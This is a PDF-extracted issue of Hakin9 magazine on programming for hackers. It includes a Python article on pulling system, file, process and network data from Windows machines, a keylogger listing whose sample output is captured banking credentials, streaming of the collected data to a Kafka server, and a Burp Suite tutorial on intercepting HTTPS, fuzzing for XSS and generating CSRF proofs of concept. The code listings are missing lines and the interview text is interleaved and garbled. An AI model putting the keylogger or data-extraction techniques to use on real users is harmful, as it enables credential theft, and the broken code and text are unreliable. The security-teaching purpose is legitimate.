Programming For Hackers
Programming For Hackers
Programming For Hackers
Editor-in-Chief Betatesters:
Joanna Kretowicz
Lee McKenzie
Editors: devzero2000
Today's issue of Hakin9 is dedicated to programming. There is an ongoing question whether programming
skills are essential to being a good hacker. Most agree that knowing how to code is necessary, although not
obligatory to become a hacker, as it will definitely help you understand some techniques and processes. If you
know how to code, you will be able to dissect code and analyze it, and to write your own scripts or your own
hacking tools.
We decided to focus mostly on Python. Why? Because Python is an extremely powerful language and it easy
to learn at the same time. With Python you can achieve your results with minimal coding, and it does not need
to be compiled. I strongly recommend reading Python for hackers: Extract gold from systems by Adrian
Rodriguez Garcia and The dangers of metadata by Verónica Berengue. In the first one you will learn about data
extraction from Microsoft Windows systems and the second one will focus on extraction images and PDF docu-
ments. More about Python and its capabilities can be found in Programming In Python, Forensic Analysis For
Samrta Das and Prasoon Nigam prepared two tutorials about Burp Suite, one of the most popular tools for per-
forming security testing of web applications. Their step-by-step articles will help you use Burp’s features easily
and efficiently.
There are a lot more articles inside, and I hope that you will find something interesting for yourself there.
We want to thank you for all your support, we appreciate it a lot. If you like this publication you can share it
and tell your friends about it! Every one of your comments is important to us. Special thanks to Beta Testers
Hakin9 Magazine’s
Editorial Team
Programming exercises - Useful links and sources 7
Harnessing the lesser known “Burp macros” for
Python To Me Podcast
Source Code review
by Atul Singh
Code About Codecademy
Codecademy is an education company. But not one in the way you might think.
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code wars Codewars is a collective effort by its users. They are creators - authoring kata to
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List of Free Learning Resources
This list initially was a clone of stackoverflow - List of Freely Available Programming
available Books by George Stocker. Now updated, with dead links gone and new content.
Python for hackers: Extract gold
from systems
malware, reason by which I design solutions based in Open Source and Big
Data to prevent and mitigate any incident that can be produced in network
systems. In addition, I’m a curious person who likes to study and test new
In short, I enjoy in the world of cyber security and new technologies where I'm
The extraction of data from any network system is the main objective pursued today. For this, different methodologies
are used according to the tastes or needs.
In this article, we will introduce the world of programming for hackers using Python, specifically, the extraction of
data from Microsoft Windows systems. The topics addressed are as follows:
• No prior knowledge is required about programming, systems or cybersecurity because all necessary knowledge
will be explained in this article.
First, we’re going to talk about what kind of information it’s useful to extract from a system and why it’s important.
Then, with Python language and the enormous power of its libraries, we will demonstrate how to extract basic informa-
tion from a system and how to monitor and extract data from the file system, processes, network connections and key-
Finally, we will talk about a possible way to manage the data extracted using Big Data technologies, like Apache Kafka.
On a computer, there’re many kinds of data. Of these, two main groups can be highlighted:
• System data.
Python for hackers: Extract gold from systems
From security and systems management point of view, of the first group, we’re interested in the data that identifies a
computer in the network to be able to manage and monitor individually.
On the other hand, of the second group, we’re interested in data oriented to the security of the computer to avoid
threats or to perform a forensic analysis in an infection case. That is, we need to know what’s happening in the system.
For this reason, it’s necessary to have real-time data about what’s occurring in the file system, in the processes or in the
To have control over the file system is very important because any creation, modification or deletion of a file may be due
to the performance or creation of malware in the system. However, the greatest danger comes from the processes. That
is, detecting the creation in real time of a process to analyze it, can cause a malware to be detected and thus act quickly
to mitigate the threat in the shortest possible time. In addition, the processes are responsible for creating the connec-
tions, so detecting it should be a priority to avoid threats and to locate possible botnets or C&C servers.
Equally important, especially in a company, is knowing when a USB is inserted or removed from a computer, because
it’s one of the main sources of malware infection.
The system data is a set of basic information that will allow you to manage and monitor a system individually within a
network. Our objective is to extract the system data for which we will use the the following programming language and
• Python 2.7
WMI is the infrastructure for data management and Windows operations. The WMI Python library provides an inter-
face for interacting with Windows WMI so we can extract information from the system quickly and easily.
We’re going to connect through the Python interface to Windows WMI and we will make requests to extract system
data. In this case, we’re going to focus on three points:
• Network data.
• Profiles data.
Listing 1:
import wmi
Python for hackers: Extract gold from systems
if netParams.DNSDomain != None:
if profileParams.Name != None:
except Exception as e:
Python for hackers: Extract gold from systems
print e
It’s observed in the previous example that the extracted data are follows:
• Network domain.
• Interface MAC.
• Interface IP.
• Subnet mask.
• System profiles.
• System operation.
• Architecture.
• Computer name.
• Registered user.
Once the script is executed on the computer, an output similar to the one shown below is achieved:
Python for hackers: Extract gold from systems
In short, in this simple way, thanks to Python, we can extract information from a network system and send it to a cen-
tral system that uses this data for any purpose, such as monitoring the system or managing it.
The data or log activities in the file system are very important because they allow you to know what happens in a com-
From a security analyst point of view, it allows you to know, in real time. the download of malware in the system or, in
case of infection, to have a registry with everything that has happened during the execution of a malicious file in the
computer. In this way, it’s possible to act and mitigate the threat later.
On the other hand, from a system administrator or devops point of view, it lets you know which files have been cre-
ated, modified or deleted in a certain period of time on a computer. In this way, they can execute the appropriate ac-
tions for the correct system behavior.
Once we know the advantages, we will proceed to extract data from the file system, but first, it’s important know how it
Listing 2:
import wmi
Python for hackers: Extract gold from systems
connection = wmi.WMI()
while True:
print "\n"
except Exception as e:
print e
As in the previous section, the first step is to establish the connection with Windows WMI. Next, the hard drive, its par-
titions, and finally the logical units are extracted. The following example demonstrates the result of inserting and ex-
tracting a USB from the computer during script execution.
Python for hackers: Extract gold from systems
This information is gold because it allows monitoring, in real time, the file systems of each of the logical units of the
system. Once again, and thanks to Python libraries, it’s possible to achieve this goal. This time the following Python
programming language libraries are used:
• Pythoncom library.
• Pypiwin32 library.
Listing 3:
import os
import pythoncom
Python for hackers: Extract gold from systems
ACTIONS = { 1: "Created",
2: "Deleted",
3: "Updated",
5: "Renamed to something"}
accessMode = 0x0001
FileSystemPath = "C:\\"
hDir = win32file.CreateFile(
flag_exit = 0
while flag_exit == 0:
Python for hackers: Extract gold from systems
results = win32file.ReadDirectoryChangesW(
if os.path.isfile(full_filename):
if action == 2:
if not os.path.exists(FileSystemPath):
Python for hackers: Extract gold from systems
flag_exit = 1
except Exception as e:
print e
First, the Microsoft Windows COM libraries have been initialized with the "pythoncom" library, which allows commu-
nication between processes to extract information and create dynamic objects. It’s very important initialize these librar-
ies because it’s necessary to capture the events of the file system that occur in different Windows processes.
The next step is to create a handler using the "win32file" library, to monitor an existing path (a file system) in "list all
directories" mode to monitor all existing subdirectories of the file system. Then, using the "ReadDirectoryChangesW"
method, the logical unit is monitored. The method must be passed the handle, the size of the buffer to store data,
"True / False" permission to read or not the subdirectories of the file system and the changes to be captured in the
Finally, the script is launched, which monitors the changes of the file system according to the configuration.
The Python library "threading" allows us to create threads to perform different tasks simultaneously, so we can create
a thread for each logical unit that exists. That is, it’s possible to monitor all logical units simultaneously, as well as any
USB that may be inserted.
Python for hackers: Extract gold from systems
The script shown above can have different uses once it’s worked and adapted to the needs of each one. It can be used
by a cybercriminal to extract any sensitive system information such as bank documents or by a security analyst to pre-
vent malware infections. For this reason among others, the library "pypiwin32" is one of the most powerful of Python
because if it’s well understood and used, it allows you to manage and extract any type of information of Microsoft Win-
dows systems.
Monitoring and extracting data from system processes is vital for three main reasons:
1. The first one is to detect as soon as possible the execution of a malicious process and to be able to act.
2. The second reason is to know the activities related to processes that have occurred in a certain period of
time so that, in case of infection, the situation will be reversed. Additionally, it serves to exercise preventive
measures for the future.
3. Finally, it’s important for management, optimization of systems or for audits on network computers.
To reach the proposed objective, we will again use Python and its following libraries:
• Pythoncom library.
• WMI Library.
• Psutil Library.
As in the previous section, the first step is to start with the "pythoncom" library and the Microsoft Windows COM li-
braries, in order to extract information from the processes. Then, by using the "WMI" library, we will establish a con-
nection with Windows WMI, and finally, we will start to monitor the creation of processes in the system.
Listing 4:
import psutil
connection = wmi.WMI()
Python for hackers: Extract gold from systems
watcher = connection.Win32_Process.watch_for("creation")
while True:
new_process = watcher()
if len(psutil.Process(new_process.ProcessID).cmdline()) == 2
and os.path.exists(psutil.Process(new_process.ProcessID).cmdline()[1]):
if psutil.Process(new_process.ParentProcessId):
except KeyboardInterrupt:
Python for hackers: Extract gold from systems
In the previous example, it’s observed that for each process created, using the "psutil" library, a series of data are ex-
tracted, which highlights the file that executes the process and the software used.
The above data has an enormous importance because this information can be used in a lot of practical applications.
For example, a cybercriminal could use them to design a malware to send information from the processes to a server
to know the software installed on the computer and thus compromise the system with the objective of creating a bot-
On the other hand, a malware or forensic analyst, with previous code worked and adapted, can greatly simplify the
work. The reason is that they can know the exact file of the infection as well as the software that has executed it, thus
allowing an immediate action.
Once the possible applications are known, we can observe the enormous importance of knowing how to work with the
processes of the system. But this is not all, because the processes are responsible for creating network connections.
Therefore, it’s possible to capture the established connections so that, in case of infection, it can act and locate the bot-
net or C&C server responsible for the attack, if it exists.
The methodology is the same that has been used before, with the difference that, once the process is captured, data is
extracted from the connection to know the servers that have routed the packets, and thus, know the name of the hosts
involved with their respective IPs.
Listing 5:
Python for hackers: Extract gold from systems
import socket
connection = wmi.WMI()
watcher = connection.Win32_Process.watch_for("creation")
while True:
new_process = watcher()
if psutil.Process(new_process.ProcessID).connections(kind="all"):
open_connection = psutil.Process(new_process.ProcessID).connections(kind="a
elif psutil.Process(new_process.ParentProcessId).connections(kind="all"):
open_connection = psutil.Process(new_process.ParentProcessId).connections(k
ip_list = []
Python for hackers: Extract gold from systems
print ip_list
print socket.gethostbyaddr(item)[0]
except Exception as e:
print e
As on all previous occasions, the first step is to start Windows COM libraries to interact with processes. The processes
that are created in real time are then monitored and the data relating to the network connections are extracted.
Once the previous code has been adapted to our needs, the script is launched and a connection is made from Google,
in this case to El País (Spanish national newspaper), obtaining a result like the following:
The above result shows all the IPs of the servers that have routed the packets and then their respective names.
In summary, the monitoring and data extraction from the processes helps in a high percentage to know what’s happen-
ing in real time in a network computer, which can produce a direct impact on the productivity of our daily work .
In this section, we will work on monitoring the pulsations of the keyboard in order to extract any sensitive data that
the end users write on the computer. In other words, a keylogger in Python is going to be designed with the help of the
following library:
• Keyboard library
Listing 6:
EXIT_KEY = "esc"
if event.event_type == "up":
pulsation =
if == "enter":
Python for hackers: Extract gold from systems
def main():
logFile = 'keyboard.log'
keyboard.hook(partial(managerFunction, handlerFile))
if __name__ == "__main__":
In the above script, we only need to understand two details. The first is know that the "hook" class of the "keyboard"
library indicates the function in which the keyboard events are handled, and the second is that the "wait" class starts
monitoring the keyboard until the character indicated will be introduced.
In this simple way, a keylogger has been built in Python, which generates results like the ones shown below:
The above result is an example of a user and password capture of a person who is doing online transactions at his
Python for hackers: Extract gold from systems
This fact demonstrates, once again, the great potential that Python has to design any program that the imagination
wants, being at the same time the face or the cross of the same coin according to the interest of each person.
Today there are multiple forms and technologies that help manage data. In this section we will talk about a specific Big
Data technology called Apache Kafka (
Apache Kafka is a complex technology to understand, so the first step is to explain several concepts in a simple way in
order to use Kafka.
• Building real-time streaming data pipelines that reliably get data between systems or applications.
• Building real-time streaming applications that transform or react to the streams of data.
• Kafka has four core APIs but in this article only two will be used.
• The Producer API allows an application to publish a stream of records to one or more Kafka topics.
• The Consumer API allows an application to subscribe to one or more topics and process the stream of records
produced to them.
In this case, Apache Kafka will be used as a messaging system to send stream of records from a producer to the cluster
in order to be able to consume them from a consumer. Therefore, all the information extracted in the previous sections
is recommended to adapt it to some format, such as XML or JSON, so that it can be parsed and easily worked later.
We need to install the Kafka cluster and then create a producer to publish the stream of records in a topic. To do this,
we need to also install the Python library "kafka-python".
Listing 7:
Python for hackers: Extract gold from systems
producer = KafkaProducer(bootstrap_servers="IP:9092")
while True:
producer.send(topic='testing', value="proof")
except Exception as e:
print e
The next step is to create a consumer to consume the stream of records from the “testing” topic.
Listing 8:
consumer = KafkaConsumer(bootstrap_servers="IP:9092")
print (streamRecords[6])
Finally, we start the cluster, the consumer and launch the producer that will publish the stream of records, which can
be consumed by the consumer.
In this case, the producer has been adapted and all data collected in the different sections of the article are sent in
JSON format to the cluster to facilitate the stream of records treatment.
Python for hackers: Extract gold from systems
Apache Kafka supports around a million events per second, which makes this technology ideal for managing huge sets
of data quickly and easily. Coupled with other technologies such as Hadoop, it allows you to handle and manage huge
volumes of data in an easy way, being very attractive for big companies in any sector where there are thousands of com-
puters that continuously send data.
In short, the growth of Big Data technologies driven by Google, Facebook, Twitter or Linkedin among other big compa-
nies are, at present, improving the management of data and the daily work of many people.
What is Burp Suite?
by Pprasoon Nigam
Pprasoon Nigam has been working as a Security Consultant for the past few
years in many large organizations and is also involved in VAPT for Web
Burp Suite acts as a sort of “Man in the Middle” by capturing and analyzing each “Request” and “Response” to and
from the target web application.
➡ An intercepting Proxy tool, which lets you inspect and modify traffic between your browser and the target ap-
➡ An advanced web application Scanner, for automating the detection of numerous types of vulnerability.
➡ An Intruder tool, for performing powerful customized attacks to find and exploit unusual vulnerabilities.
➡ Extender, allowing you to easily write your own plug-in, to perform complex and highly customized tasks
within Burp.
The Burp Suite or a (Manual) Proxy tool is an intercepting proxy tool that intercepts all the traffic (Request and Re-
sponse) which is sent from Client to Server and vice versa.
The primary job of the Burp Suite Proxy tool is to intercept regular web traffic, which goes over Hypertext Transfer Pro-
tocol (HTTP), and with additional configuration, encrypted HTTP (HTTPS) traffic as well. Burp Suite can be used to
intercept any client-server communication that goes over HTTP.
You may be thinking, what type of question is this, but still opening a Burp Suite in incorrect manner will affect the
space in your device. Also allocating the correct or specific RAM memory to Burp Suite is very important.
So, how do you open Burp-Suite? (Burp requires “Java” to be installed and configured on your system.)Method 1:
Double-click on the Burp-suite .jar file.
Figure 1: Burp-Suite .jar file.
But the above method will allocate the maximum memory available to Burp Suite. The allocated amount of memory
might vary based on the available RAM in the system. If a sufficient amount of memory is not allocated, there is a pos-
sibility that Burp Suite may crash. While testing, Logs are maintained, “Repeaters” have many test cases performed by
the security consultant, etc., and crashing of Burp-Suite may lead to a loss of all data, and at last, we are left with two
words "OH-Shit" or "OH-F**K".
Command: java -jar /path/to/burpsuite.jar (open "command prompt" => (window key + r =>
type "cmd" and hit Enter))
Figure 2: Opening Burp Suite with command line through command prompt.
Method 3: Specifying Memory (Recommended)
Command: java -jar -Xmx2G /path/to/burpsuite.jar (allocating 2GB of RAM to Burp Suite)
Now that we’ve seen all the ways to open Burp Suite, let's take a look over Burp Suite.
1) Free version
1) Scanner
2) Search
4) Project options
As we have studied about, "What is Burp Suite" and "How Burp Suite works", now let’s get deep into Burp Suite’s tabs
and features.
1) Target: Target is to define the scope or the target website (URL) to be tested.
2) Proxy: Intercepting Proxy lets us inspect and modify traffic between your browser and the target applica-
4) Scanner: Scanner helps us to scan almost all vulnerabilities presented by and others from
“Critical” impact to “Informational”.
5) Intruder: Intruder performs powerful customized attacks to find and exploit unusual vulnerabilities, like
Brute force.
6) Repeater: Repeater helps to resend and also manipulate the individual requests, without touching or dis-
turbing the browser.
8) Decoder: Decoder helps in decoding and even encoding of data, to get back data in normal form or encode
it in any specific form, like HTML encoding, BASE 64, etc.
10) Extender: Extender allows you to easily write your own plug-ins or download pre-created plug-ins, to per-
form complex and highly customized tasks.
11) Project Options: Helps in adding features or tasks for Sessions, SSL, etc.
13) Alerts: Shows all the alerts happening within Burp Suite.
It will be more beneficial if we get to know about every above functionality while testing.
So the most important task is configuring the Burp Suite to your browser (Mozilla Firefox recommended).
Step 1: Open Mozilla Firefox (if not installed please refer here =>
Step 2: Click on the "Option" icon (3 parallel lines (right end corner)) and select option "options"
Step 3: Click on the "Advanced" option > select "Network" > Select "Settings" under "Connection"
Step 5: In "HTTP Proxy" type "" and in "Port" type "8080" and check the "checkbox" "Use this proxy server
for all protocols"
Step 8: Under "Proxy Listeners" check the same proxy IP is present ""
Method 2: Short Method (Installing "FoxyProxy" add-on)
Step 1: Navigate to the following link and click on "Add to Firefox" (It will install automatically with a restart of
browser) or search in Google => “FoxyProxy addon”.
Step 3: Click on "Add New Proxy" > Enter "Server or IP Address "" with Port “8080” and Click OK.
Figure 9: Adding Server IP Address.
Step 4: Right Click on the FoxyProxy (Fox face) icon and select newly added proxy “Use proxy “” for all
Let's test if our configuration (Browser and Burp Suite) is working or not (which means Burp Suite is "Intercepting"
the "Request" and "Response")
Step 1: Check in Burp Suite "Intercept is on" under "Proxy" option. (If not then click on it, it will be on)
Step 3: Observe that "Request" is passing through Burp Suite as shown in the below image.
Figure 11: Request is passing through the Burp Suite proxy tool.
Figure 12: Check the box "Intercept responses based on the following rules:"
Step 1: Check in Burp Suite "Intercept is on" under "Proxy" option. (If not then click on it, it will be on)
Step 3: Observe that "Request" is passing through Burp Suite. Now click on "Forward" and observe that "Response" is
passing through Burp Suite (as shown in the below image) and again click on "Forward" (so that website opens in the
Figure 13: Response is passing through the Burp Suite proxy tool.
So you are ready to intercept the entire "http" website but what about the website running on "https".
Note: Observe that "Response" was not getting intercepted, so to intercept the "Response", the following
are the steps:
Step 1: In Burp Suite, navigate to Proxy > Options, under the "Intercept Server Responses".
Step 2: "Check" the "Intercept responses based on the following rules:" (Refer to the image below)
Figure 14: "https" website showing "Connection is not secure" message.
Step 1: In the browser, type “" and click on "CA Certificate" and click save to download the certificate.
Step 2: Click on the "Option" icon (3 parallel lines (right end corner) and select option "options".
Step 3: Click on the "Advanced" option > select "Certificates" > Select "View Certificates" under "Requests" a window
will open.
Figure 16: Installing Burp Suite CA Certificate.
Step 4: Click on "Import" > select the certificate from the folder where it has been saved (Downloads folder) > a win-
dow will appear to check all the “check boxes” and click “OK”
Figure 17: Installing CA Certificate by giving all the Trust Certificate Authority.
Step 5: Navigate to “” and observe that "https" websites are easily opening in the browser.
Step 6: Click on "Intercept is off” to make it on, again open/navigate "", and observe that
"https" are getting intercepted in Burp Suite.
Note: All the above steps will be followed for paid/license version of Burp-Suite also.
L3T’S ST@RT S3CUR!TY T3ST!NG with Burp Suite
As we know a little on every tab present in Burp Suite, let’s begin learning every functionality in detail.
We will be security testing "" web application to understand the functionality of all the tabs
present in Burp Suite.
Tools Needed:
• Browser: Mozilla
Proxy Tab
• Proxy allows us to intercept the web traffic's every "Request" and "Response" between browser (client) and
the server.
• Proxy also helps us to see all the "Request headers" and also the "Response Headers".
• Proxy helps in finding hidden parameters and also edits parameter values before sending to the server.
• Proxy helps in bypassing all the client side validation created by the developer in the web application.
Figure 18: Intercept tab with Request intercepted.
Intercept: Intercept tab helps in intercepting the web traffic's every "Request" and "Response" between the browser
(client) and the server. (Refer to the above two images)
HTTP history: All intercepted traffic (Request and Response) can be quickly analyzed in this tab and also it keeps it
as a log of all the traffic.
Figure 20: HTTP history, intercepted traffic (Request and Response) can be quickly analyzed
Options: Proxy configuration can be modified from this tab, like Proxy Listeners, Intercept Client Requests, etc.
Figure 21: Customizing the proxy settings.
Target Tab
Being a security professional or even a tester, it’s always important to set the target and scope of what we are testing. It
may be a website or even a single module in the web application or a mobile app.
Figure 22: "Target" shows the target URL.
Step 2: Navigate to "Target" in Burp Suite > Under “Site-map” right-click on the URL (, a
menu will open, select "Add to Scope" (This will define the target or scope that we are testing).
Step 3: Navigate to "Scope" under Target in Burp Suite and observe under heading "Target Scope", scope
( has been added or included in "Include in scope".
Figure 24: Target URL has been added to Scope.
"Include in scope" also helps us to include or add target/scope manually if you miss any URL or any other URL rather
than testing URL.
Step 1: Click on "Add" button, a window will appear > protocol (http or https) > Host (Website URL) > Port (80 or
443) > File (Optional) and click "OK".
Figure 26: Target added manually.
Select the Newly added target/scope (URL) and click "Remove", to remove the scope (if not needed). "Exclude from
scope" helps us to exclude some URLs, like Logout, Sign out, etc., so that we don't logout from the current session and
our testing may not get interrupted while scanning the target.
Note: "Site map" also shows URLs that are not in scope and also that have passed through Burp Suite.
Spider Tab
Spider is also known as "web crawling". Spider helps to crawl all the links present in the URL if any are missed by us
while testing or maybe we can get any important link which can give the attacker good information. Spider crawls all
the links on a web page to discover both static and dynamic web resources.
Spider always crawls/fetches the links that are defined in the target/scope.
1) Navigate to "Spider" in Burp Suite > "Control" tab under "Spider scope" heading.
Figure 28: Spider Scope option for crawling the URL within.
2) Under Spider in Burp Suite > "Control" > "Spider status" helps us know how many "Requests made", we
can pause the current running spider, etc.
Figure 29: Spider status to pause and run the spider and also get to know the status.
3) Under "Spider Scope" > "Use custom scope" is used to add any URL we want to spider beside the target
URL (the steps are the same as adding target URL in "Include in Scope")
"Options" help the user to customize the crawling on URL, like what to crawl, maximum request to be sent,
Application login customization (Submit username password (for login pages) or Don't submit forms),
Number of threads (can increase or decrease), etc.
Figure 31: Options help in customizing the crawling.
Navigate to "Target" > under "Site map" > select the target URL > right-click, menu will open, select "Spider this host"
> Click "Yes" to start the crawling.
Figure 32: “Spider this host” by selecting it from the menu.
Click on "small arrow" on target URL under "Site map" tab (Under "Target" in Burp Suite); observe that many URLs
have been discovered.
Scanner Tab
The scanner is for vulnerability assessment of a web application. (For paid/License version)
Scanner helps in scanning vulnerabilities in two methods:
Active Scan: Active scan or direct scanning, which involves sending more data to the server.
Passive Scan: Passive scan or indirect scan, which scans vulnerabilities passing through the proxy tool.
Step 1: Navigate to "Target" in Burp Suite > right-click, a menu will open, select "Actively scan this host" > click
"Next" > Click "OK" and click "Yes" (Same goes with "Passively scan this host").
Figure 36: URLs getting scanned, shown in "Scan queue".
Vulnerabilities/issues can be observed and are listed under "Target" tab > "Site map" > Issues.
Figure 37: Vulnerabilities that are discovered are shown in Issues (Site map).
Under "Scanner" > "Options", a user can customize the scan, the number of threads to be sent, etc. Scanner options
help to understand what type of values will be fuzzed as part of the active scanning mode.
Figure 38: Options tan represent what all are fuzzed or testing by the scanner.
Under "Scanner” > "Issue Definitions", a user can study about all the vulnerabilities with detailed knowledge and reme-
✓ User options are basically used to customize Burp Suite as per the user like Text Size "HTTP Message Dis-
play", Burp Suite display "User Interface", etc.
✓ User options show all the Hotkeys and even edit them as per convenience of the user.
✓ User options help the user to save "Temporary Files" at a user customized location.
✓ User options help the user to report bugs to "PortSwigger" or submit anonymous feedback (advanced level).
✓ User options also lets a user configure (add/remove) “Client SSL Certificates".
Comparer Tab
✓ Comparer, as the name says, is for comparing different HTTP Requests and Responses.
✓ Comparer helps the tester to compare different values for parameters and headers.
✓ Comparer checks the behavior of the application that reacts to the valid user or invalid password combination
or vice versa.
Step 1: Intercept the Request > right-click select "Send to Comparer" > Intercept another Request and "Send to Com-
Figure 41: Sending "Intercepted Request" to the "Comparer".
Step 2: Navigate to "Comparer" and chose the option for comparison => "Words" or "Bytes".
Figure 42: Comparer window which compares Words by Words or Bytes by Bytes.
Step 3: Wait for a while till Burp Suite does its work.
Figure 43: Comparer result window.
Alert is not a tool but for all suite-wide notifications that Burp might want to share. Its a good place to see whether the
proxy started successfully or faced any errors. Whenever there are issues with SSL negotiation for applications, the in-
formation on the errors, and others, they can be found in the Alerts tab. It is a good idea to check what is being listed
here if something is not working.
Sequencer Tab
➡ Sequencer helps in verifying the randomness and predictability of security tokens, cookies and more.
➡ Sequencer helps in analyzing the predictability of the application data, such as session cookies and anti-CSRF
tokens. Sequencer gathers application data (Request and Responses) and analyzes data.
Step 1: Intercept the "Login" request > Right-Click, select "Send to Sequencer".
Step 2: In Sequencer tab > under "Select Live Capture Request" select the Request and click "Start live capture".
Observe that "Live Capture" started.
Note: "Pause" and "Stop" can be done anytime and analyze the token.
Figure 47: Live capture started with "Pause" and "Stop" option.
Observe that the result is declared after the sequencer has analyzed everything.
Intruder Tab
• Intruder performs fuzzing with different content with the same request multiple times.
• Intruder web fuzzing typically consists of sending unexpected inputs to the target application.
• Enumerating common directories and files that can cause information leakage.
1) Sniper
2) Battering ram
3) Pitchfork
4) Cluster bomb
Sniper: Sniper replaces all positions with strings from a single payload list. It will iterate through all payloads one by
one for all positions.
Battering ram: All positions are simultaneously replaced with the same attack payload.
Pitchfork: Pitchfork uses two or more payload lists, depending on the number of marked positions. It will use the
first word of the first list for the first position and so on.
Step 1: Intercept the "Login" request > Right-Click, select "Send to Intruder".
Step 2: Under "Positions" > Under "Payload Positions" => "Attack type" set to "Sniper" > click "Clear" > select the pa-
rameter and click "Add".
Step 3: Under "Payloads" > Under "Payload Options", enter multiple payloads and click "Add" every time you add a
new payload > click "Start attack" to start attack.
Note: Under "Payload Options" > click "Load" to submit the full wordlist or add a
preloaded list select from "Add from list".
Extender Tab
➡ As we know, Burp Suite on its own has many sets of functionalities (Tools), but also provides API interfaces
for extending more functionality and finding vulnerabilities.
➡ Extender also helps the user to implement their own extensions written in JAVA, Python, and Ruby.
Figure 55: Installing "XssValidator" from BApp.
Step 1: Intercept a Request with some parameter, for example "search" Request and send to "Intruder".
Step 2: Navigate to "Extender" in Burp Suite > under "BApp Store" > select "XSS Validator" > click "Install".
Step 3: Navigate to "Intruder" > under "Payload Sets" > select "Payload type: Extension-generated" > under "Payload
Options” > click "Select generator" (drop-down menu)> window will open select "Extension payload generator: XSS
Validator Payloads" > "Selected generator: XSS Validator Payloads" > Click "OK".
Figure 58: Configuring XssValidator to be used in Intruder.
Step 4: Navigate to "XSSValidator" > copy "Grep Phrase" in XSSValidator> Navigate to "Intruder" > Under "Options"
tab > under "Grep-Match", click "Clear” to clear all the Grep match > Paste the Grep Phrase already copied from
Figure 60: Adding XssValidator Grep Match in Intruder Grep - Match.
Step 5: start attack (Intruder (in menu)) > click "Start attack" option.
Observe that Attack has been started and the payloads are brute forced on the “search” parameter.
To observe the response in the browser, navigate to any "Response" (positive response) and Right-Click to select
"Show response in browser".
Figure 63: Click on "Copy" and paste in browser address bar.
Observe that Reflected Cross Site Scripting (XSS) vulnerability has been discovered with the help of "XssValidator"
and "Intruder".
Cross-Site Request Forgery (CSRF)
Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web applica-
tion in which they're currently authenticated. CSRF attacks specifically target state-changing requests, not theft of
data, since the attacker has no way to see the response to the forged request.
Generating CSRF POC with Burp Suite (works in Paid/license version only)
Step1: Navigate to web application ( Login with credentials “test” (same for
both username and password).
Step 3: Right-click and in menu select "Generate CSRF PoC" in "Engagement tools".
Figure 66: Generating CSRF PoC.
Step 4: "CSRF PoC generator" window will open > click on "Copy HTML" button and paste in "Notepad".
Figure 68: Paste the generated CSRF PoC into the notepad.
Step 6: Open the saved “.html” file in the same browser where we have logged into the account.
Figure 70: Click on submit button after opening the "html" file in same authenticated browser.
Figure 71: Content before CSRF attack.
“I always tell people: learn a programming
language that will help you achieve your
My greatest professional passion is empowering people to improve their careers and life via
technology and online education. To this end, I specialize in product education and product
management in the EdTech industry, turning insights from the user community into action-
• Liaise with users and collaborate across teams as the Product Educator at Teachable, an
educational technology startup providing online learning infrastructure to over 3 million stu-
• Founded, grew, and administer Learn to Code With Me, a blog and podcast reaching an
taught coders
and technology
[Hakin9 Magazine]: Hello Laurence! Thank you for developers in the US. And how it is only going to rise in
agreeing for the interview, we are honored! How the coming years. So, it was an easy decision. The only
have you been doing? Can you tell us something doubt was doubting myself and if I could stick with it.
about yourself?
[H9]: Where the idea of creating the blog LEARN TO
[Laurence Bradford]: Hey! Thanks for having me. I am CODE WITH ME came from?
I love helping people get paid to use their coding skills. [H9]: Do you remember the moment when you real-
grad school. And I began keeping a travel blog which [H9]: Why choose coding? Do you think that people
introduced me to the web. It was several factors – need more guidance in this area?
[H9]: It was a good choice – but was it an easy one? don’t want to become a web developer/software engi-
Did you have any doubts? neer, having coding skills can make you a more attrac-
Laurence Bradford, the creator of Learn to Code With Me
not. It can be really frustrating. Especially for people As far as “favorite”—like I found it enjoyable to work
who are transitioning into it. So, those who don’t hold a with—I suppose Python. While it’s not technically a pro-
degree in CS. (Like me!) It’s like…a whole new world. gramming language, I really, really, really like Sass. Mov-
So yes – I think people who are unfamiliar with technol- ing from CSS to Sass was a game-changer.
[LB]: I usually tell most people to start with HTML and Arduino class once and wanted to cry in frustration!
CSS. You can see it right in your web browser with a However for other people, they are a natural with hard-
few clicks. (Inspect element and view page source.) You ware. They like to hook things up – literally build with
can see the changes instantly – it’s their hands. However, maybe for them designing a web-
no reason to spend money. (Now…as you progress, I [LB]: “What should I learn?”, “Where
think investing in books and paid courses is important. should I learn?”, and “Where should I learn next?” Are
Because the material is more in-depth.) probably the three most common. (Or some variation
and why this one? Or maybe you have more than [H9]: Your community at LEARN TO CODE WITH ME
and my goals, all I really need to know is HTML, CSS (I [LB]: Oh thank you! That means a lot. Yes – definitely.
use Sass), some jQuery, and PHP. (PHP because I use One of the best places to see the community is in my
WordPress to power the blog.) Facebook group – Newbie Coder Warehouse. (Yes, I
decided to go with another name for the group, be- cally on starting your own business, and how to go
cause I felt like “Learn to Code With Me” was too about that. (From the perspective of people who know
“me”. And I wanted to make it more about the commu- how to code.)
[H9]: I found an information that you are planning to tech-related. Many are unsure what they should include
launch your first podcast episode in late April. Can on their resume/portfolio, not confident in their abili-
you tell us something about this project? ties, fear the technical interview, and so on.
[LB]: Yes – the Learn to Code With Me Podcast will be Plain and simple: the goal of the podcast is to better
tentatively launching on April 26th. (As long as the equip self-taught coders with the confidence and knowl-
iTunes approval process doesn’t hit any hiccups – it usu- edge that can help them land a new career in tech.
[H9]: So the podcast will be specifically aimed at finalized yet, but it will most likely related to getting a
teaching coders how to market themselves and their new career in tech.
Laurence Bradford, the creator of Learn to Code With Me
all books, articles, etc. you want. (Or listen to podcasts!) But they won’t really get you anywhere. Taking action will.
Even if you “fail” at whatever it is you’re trying to do (build a startup, learn to code, start a podcast, etc.) you’ll learn
more from the process of actually doing than from reading another book!
Understanding CyberCrime and
by Colin Renouf
worked in multiple roles and industries over the period of decades. An eter-
nal student, Colin has other degrees in varied subjects in addition to that for
IT. Having written several books and articles ranging from architecture, Java,
and security, and contributed to well known products from the likes of IBM
technology. Colin has had several jobs in the past, but his first role after get-
trade. Colin has two incredibly smart and intelligent children, Michael and
Olivia, who he loves very much. Thank you Brendan, Norman, Ben, Shane
In this article we will look at what we mean by cyber crime and set its boundaries, i.e. what distinguishes cyber crime
from other types of crime; and look at the criminals that commit such crimes and their motivations. This understand-
ing is needed to deter the criminals from attacking in the first place; and after they have attacked, determine what fo-
rensic information is required and what approach is needed to be able to successfully prosecute the perpetrator.
To set the boundaries for cyber crime, we need to understand the legal definitions that separate it from other types of
crime. A cyber crime has one or more of the following characteristics:
